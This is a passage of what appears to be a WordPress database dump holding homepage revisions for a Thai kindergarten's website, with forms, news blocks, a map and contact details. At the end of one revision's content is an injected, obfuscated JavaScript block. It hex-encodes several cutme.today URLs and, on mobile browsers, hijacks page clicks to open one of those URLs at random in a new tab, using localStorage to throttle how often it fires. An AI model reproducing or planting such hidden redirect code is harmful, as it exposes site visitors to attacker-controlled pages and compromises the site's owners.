{\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 14:32:55','2025-07-15 07:32:55','',19,'http://watprato.ssk.in.th/?p=684',0,'revision','',0),
(685,1,'2025-07-15 14:34:23','2025-07-15 07:34:23','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- 